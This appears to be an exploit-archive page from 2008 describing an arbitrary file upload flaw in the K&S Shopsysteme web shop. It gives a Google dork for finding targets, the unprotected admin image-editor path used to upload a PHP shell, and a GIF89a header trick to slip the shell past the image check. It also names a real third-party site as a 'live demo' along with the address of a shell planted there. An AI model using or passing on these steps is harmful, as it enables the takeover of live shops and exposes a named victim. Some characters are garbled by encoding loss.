[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : K&S Shopsysteme Arbitrary Remote File Upload Vulnerability
# Published : 2008-12-17
# Author : mNt
# Previous Title : BP Blog 6.0/7.0/8.0/9.0 Remote Database Disclosure Vulnerability
# Next Title : r.cms v2 Multiple SQL Injection Vulnerabilities
## Script Name: Shopsysteme (new version oscommerce)
## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :)
## Author: mNt
## File Upload Bug
## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme i?§in yakla???±k 32.900 sonu?§tan 191 - 200 aras?± sonu?§lar (0,51 saniye)]
## Use:
http://www.example.com/
after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php
File uploaded php shell
after in url: http://www.example.com/images/upload/mNt.php
Attention: Shell Code ?°n GIF89;a
## Live demo: http://www.trampleandfetish.de/admin/editor/image.php
## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php
## Thanks: Del?°DolU, HeDgEs, Scarface, Cih@t, Suskun D??nyam, Lodos2005, Sabotage
## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net
# www.Syue.com [2008-12-17]